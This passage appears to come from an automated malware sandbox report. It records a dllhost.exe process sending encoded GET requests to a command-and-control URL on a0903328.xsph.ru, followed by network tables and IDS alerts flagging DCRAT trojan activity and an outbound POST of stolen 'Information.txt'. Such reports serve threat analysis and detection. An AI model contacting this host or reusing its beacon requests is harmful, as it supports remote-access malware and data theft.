k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtkeBlnW1x2RjdnVHRGVCNkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTycGSLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0cVYzpEWaNUOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUar5mYoFTbjxGZFlEdBNkWsxWbaBnTXp1dOhUSwkTbUl2bqlkbKNjYpdXaJpXUE9kM0M0TzdGRPhXRqx0dVpWS2kUeZZHetl0cJNlUFpUaPl2auNGM1cFZ25UbJNXSTpleOhlWJpUaPlGNyIGckdlW5p0QMlGNXFGaxUUS0Z0RJBjSYRWb01mYopkbSl2bqlUNShVYqp0QMl2Zq1UdJpXT4RzUPBTSqx0MnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiIwUjNwgzMjNmZhNmZ1QmMmFzNkNmN4YGZiNTZhZGM2QzN4ETYlJTM0IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W | unknown | text | 104 b | unknown |
3320 | dllhost.exe | GET | 200 | 141.8.194.74:80 | http://a0903328.xsph.ru/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&66f60e2c9a37676155aaabfccaaa2e55=2EWYmVTO1gTNhljZ0EmZyYGMlZmZzEzMzgjN2ETM0MmZzYGMiJjMzETMzcjNyMTNyQTOxUDN&20274e841d64dbb552e0660e549241d1=QZkZTN4QWNzEWNzQWN0QmNyITOyMGOkBTM3Q2YkRDZ5kzYhBjNyMjY&cbb854e447dff9edaaa18d99c48a473a=d1nI0MDM0UzNmJGZzIWOiF2Y5cDZ1MDMkZDZ1MjYkJTO1kDMlFzMkJmM1IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W&302fb9824e06f0ec58a353322a4b8a0e=0VfiIiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiI0MDM0UzNmJGZzIWOiF2Y5cDZ1MDMkZDZ1MjYkJTO1kDMlFzMkJmM1IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplEbohlW1FlaOZmWE9ENxMUZwhXbaBjVtJ2Y4Z0Y0Z1RWNGeGJGaOJjYNhnRYhmUYlVRCh0YChnRYVHbXJ2aGdEWj5kbjxmTYZ1Y4x2TEpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtkeBlnW1x2RjdnVHRGVCNkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTycGSLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0cVYzpEWaNUOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUar5mYoFTbjxGZFlEdBNkWsxWbaBnTXp1dOhUSwkTbUl2bqlkbKNjYpdXaJpXUE9kM0M0TzdGRPhXRqx0dVpWS2kUeZZHetl0cJNlUFpUaPl2auNGM1cFZ25UbJNXSTpleOhlWJpUaPlGNyIGckdlW5p0QMlGNXFGaxUUS0Z0RJBjSYRWb01mYopkbSl2bqlUNShVYqp0QMl2Zq1UdJpXT4RzUPBTSqx0MnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiIwUjNwgzMjNmZhNmZ1QmMmFzNkNmN4YGZiNTZhZGM2QzN4ETYlJTM0IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W | unknown | text | 104 b | unknown |
3320 | dllhost.exe | GET | 200 | 141.8.194.74:80 | http://a0903328.xsph.ru/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&66f60e2c9a37676155aaabfccaaa2e55=2EWYmVTO1gTNhljZ0EmZyYGMlZmZzEzMzgjN2ETM0MmZzYGMiJjMzETMzcjNyMTNyQTOxUDN&20274e841d64dbb552e0660e549241d1=QZkZTN4QWNzEWNzQWN0QmNyITOyMGOkBTM3Q2YkRDZ5kzYhBjNyMjY&302fb9824e06f0ec58a353322a4b8a0e=QX9JSUNJiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiIhJGNiRGZ5kDOzgjNmZTOkFmZiNWZmJjNiRTM4YmNzUGMmFDZlJDOhJiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W | unknown | text | 104 b | unknown |
3320 | dllhost.exe | GET | 200 | 141.8.194.74:80 | http://a0903328.xsph.ru/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&66f60e2c9a37676155aaabfccaaa2e55=2EWYmVTO1gTNhljZ0EmZyYGMlZmZzEzMzgjN2ETM0MmZzYGMiJjMzETMzcjNyMTNyQTOxUDN&20274e841d64dbb552e0660e549241d1=QZkZTN4QWNzEWNzQWN0QmNyITOyMGOkBTM3Q2YkRDZ5kzYhBjNyMjY&cbb854e447dff9edaaa18d99c48a473a=d1nI0MDM0UzNmJGZzIWOiF2Y5cDZ1MDMkZDZ1MjYkJTO1kDMlFzMkJmM1IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W&302fb9824e06f0ec58a353322a4b8a0e=0VfiIiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiI0MDM0UzNmJGZzIWOiF2Y5cDZ1MDMkZDZ1MjYkJTO1kDMlFzMkJmM1IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplEbohlW1FlaOZmWE9ENxMUZwhXbaBjVtJ2Y4Z0Y0Z1RWNGeGJGaOJjYNhnRYhmUYlVRCh0YChnRYVHbXJ2aGdEWj5kbjxmTYZ1Y4x2TEpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtkeBlnW1x2RjdnVHRGVCNkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTycGSLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0cVYzpEWaNUOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUar5mYoFTbjxGZFlEdBNkWsxWbaBnTXp1dOhUSwkTbUl2bqlkbKNjYpdXaJpXUE9kM0M0TzdGRPhXRqx0dVpWS2kUeZZHetl0cJNlUFpUaPl2auNGM1cFZ25UbJNXSTpleOhlWJpUaPlGNyIGckdlW5p0QMlGNXFGaxUUS0Z0RJBjSYRWb01mYopkbSl2bqlUNShVYqp0QMl2Zq1UdJpXT4RzUPBTSqx0MnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y3IGNhJDZkRTOwEWYkdjNmV2M1ADZ5ITMiNTMiFGMiwiIwUjNwgzMjNmZhNmZ1QmMmFzNkNmN4YGZiNTZhZGM2QzN4ETYlJTM0IiOikTM2UWO5gjNyMTYmNzYxEDM0QzMiNmMkNzY1gTYkJzMiwiI4EGO3UTY1kDNzIDZ3M2YzEDZmF2NzYDZjZWNhVDNiJWNzEGNyUmNlJiOiEmNwADMkVWN1UzMmNmMmFDZ3QmYhFTNiNTMiRGZxYTMis3W | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3320 | dllhost.exe | 141.8.194.74:80 | a0903328.xsph.ru | Sprinthost.ru LLC | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
a0903328.xsph.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |
3320 | dllhost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
3320 | dllhost.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
3320 | dllhost.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |